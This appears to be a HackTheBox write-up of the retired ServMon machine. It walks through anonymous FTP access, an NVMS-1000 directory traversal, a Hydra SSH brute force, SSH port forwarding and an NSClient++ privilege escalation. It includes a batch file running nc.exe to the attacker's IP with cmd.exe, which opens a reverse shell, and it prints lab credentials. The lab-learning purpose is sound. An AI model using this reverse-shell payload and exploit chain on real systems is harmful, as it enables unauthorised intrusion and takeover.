Writeups of HackTheBox retired machines
2.1- nmap scan
2.2- FTP Browsing
4- Privilege Escalation
4.1- Post-Compromise Enumeration
4.2- Post-Compromise Exploitation Part 1 - Web Server Connection
4.3- Post-Compromise Exploitation Part 2 - Script Execution]
First things first, we begin with a
First, what do we have here ?
dirbusterto have a look on directories and files we may find.
As we know we can login to the FTP, let’s try it and login using credentials anonymous:anonymous:
root@kali:~# ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:05PM <DIR> Users 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:06PM <DIR> Nadine 01-18-20 12:08PM <DIR> Nathan 226 Transfer complete. ftp> dir Nadine 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:08PM 174 Confidential.txt 226 Transfer complete. ftp> dir Nathan 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:10PM 186 Notes to do.txt 226 Transfer complete.
We download these 2 files and examine their content :
Of course, we don’t have Nathan’s creds at the moment, but we can search for NVMS.
Googling information about NVMS, we find on the product page http://en.tvt.net.cn/products/188.html that NVMS-1000 is a monitoring client which is specially designed for network video surveillance.
In the “Features” section, we can read the following: “Brand new user interface: Main panel as the unified entry, clearly classifies the main functions. Each function adopts dynamic Tab label for easy operation. Preview window has embedded toolbar and right-clicking menu; adopts accordion tree view control.”
We understand that there might be a web server and an interface installed on the machine. We easily find it by typing the url http://10.10.10.184, which is redirected here:
When we googled NVMS, we also noticed a link to EDB: NVMS 1000 - Directory Traversal - https://www.exploit-db.com/exploits/47774.
Using it is as simple as putting the request in
Burp Repeater and clicking “send”. Testing it with C:\windows\win.ini is nice, but we are interested in the passwords file we read about. Let’s try if we can read this file using the exploit :
Now, we just have to put our users Nadine and Nathan in a file “users.txt”, the passwords in another file “passwords.txt”, and run
hydra to test which creds are valid for a ssh login:
I love it when a plan comes together.
The creds we were looking for are nadine:L1k3B1gBut7s@W0rk
Before using a privesc reporting tool like
WinPEAS, I usually check around if there is nothing obvious.
I first look at the account permissions with “whoami /all” command, but nothing particular here. Nadine has a low-privileged account.
Then I look at directories, and this time we can notice an unusual one: “C:\Program Files\NSClient++”. This one corresponds to what we previously read in Nathan’s text file mentioning this application.
Google is our very best friend (when they don’t spy to much on their users in “private mode” :joy: but whatever…).
We find a link to its website https://nsclient.org/. “NSClient++ is an agent designed originally to work with Nagios but has since evolved into a fully fledged monitoring agent which can be used with numerous monitoring tools (like Icinga, Naemon, OP5, NetEye Opsview etc).”
There is also a link to its documentation: https://docs.nsclient.org.
Exploit-DB is our second best friend.
Here is what we find: NSClient++ 0.5.2.35 - Privilege Escalation - https://www.exploit-db.com/exploits/46802
Reading the exploit, there is a 7 steps process which requires an attacker to have local access to a system running NSClient++ with Web Server.
At the first step, it is written that we may grab the administrator password in the file C:\Program Files\NSClient++\nsclient.ini. Let’s have a look to this file :eyes: :
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini ´╗┐# If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module <MODULE NAME> --add-defaults # For details run: nscp settings --help ; in flight - TODO [/settings/default] ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ...
OK. We have a password, and the “allowed hosts” parameter confirms that we should have a local access to the machine. So, how and where can we log into ?
As we have a local low-privileged SSH access, we may try using this compromised windows machine to set up a port forwarding.
With SSH, we access the windows machine on its port 22 and we want to get to the NSClient application port. But which port is it ?
We look for port number on the documentation site and we get the information we need on https://docs.nsclient.org/reference/generic/WEBServer/#port-number:
Now, we know the port is 8443. We can use the following command to connect to the web application page:
root@kali:~# ssh -N -L 0.0.0.0:8443:127.0.0.1:8443 email@example.com
Let me explain:
We execute an ssh command from our attack machine. We will not technically issue any ssh commands (-N) but will set up port forwarding (with -L), bind port 8443 on our local machine (0.0.0.0:8443) to port 8443 on the target (127.0.0.1:8443) and do this through a session to our original target 10.10.10.184, logging in as nadine.
Once we understand this, we may want an easy way to use this command, like a “fire and forget” mode where you don’t have to enter the password. Let’s give a try to this one-liner:
root@kali:~# expect -c 'spawn ssh -N -L 0.0.0.0:8443:127.0.0.1:8443 firstname.lastname@example.org; expect "password:"; send "L1k3B1gBut7s@W0rk\r"; interact'
Now we can connect the application:
We should keep an eye on the Exploit-DB page and follow instructions:
“2. Login and enable following modules including enable at startup and save configuration:
-> Scheduler “
These modules are already enabled:
Now, the plan is to upload a script to get a reverse shell and make the NSClient application run it as Administrator. “3. Download nc.exe and evil.bat to c:\temp from attacking machine “
We make a file including the code :
@echo off c:\temp\nc.exe 10.10.14.23 443 -e cmd.exe
And we set up a web server or a FTP server on our attacking machine to be able to transfer the files “nc.exe” and “evil.bat” on the target. If we choose to set up a FTP server:
root@kali:~# systemctl start pure-ftpd
From the target, we connect to the ftp and download the files:
nadine@SERVMON c:\Temp>ftp 10.10.14.23 Connected to 10.10.14.23. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 50 allowed. 220-Local time is now 18:33. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. 504 Unknown command User (10.10.14.23:(none)): fred 331 User fred OK. Password required Password: 230 OK. Current directory is / ftp> get evil.bat 200 PORT command successful 150 Connecting to port 51951 226-File successfully transferred 226 0.000 seconds (measured here), 417.48 Kbytes per second ftp: 53 bytes received in 0.00Seconds 53000.00Kbytes/sec. ftp> get nc.exe 200 PORT command successful 150-Connecting to port 51962 150 58.0 kbytes to download 226-File successfully transferred 226 0.068 seconds (measured here), 0.83 Mbytes per second ftp: 59584 bytes received in 0.10Seconds 572.92Kbytes/sec. ftp> quit 221-Goodbye. You uploaded 0 and downloaded 59 kbytes. 221 Logout. nadine@SERVMON c:\Temp>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of c:\Temp 27/05/2020 17:34 <DIR> . 27/05/2020 17:34 <DIR> .. 27/05/2020 17:34 53 evil.bat 27/05/2020 17:34 59,584 nc.exe 2 File(s) 59,637 bytes 2 Dir(s) 27,869,081,600 bytes free
Next step of the process:
“4. Setup listener on attacking machine”
root@kali:~# nc -nlvp 443 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443
Then (we are almost done):
“5. Add script foobar to call evil.bat and save settings”
We go in the “Settings” menu and click “Add new” to add our script “evil.bat”:
Step 6 proposes to schedule the script, but clicking the “Control” button in the upper-right corner allows to restart NSClient and then we just have to run our script from the “Queries” tab using the “myshell” button (the one we previously set when adding our script):
We have our shell !!
And we can grab the root.txt file:
Be Curious, Learning is Life !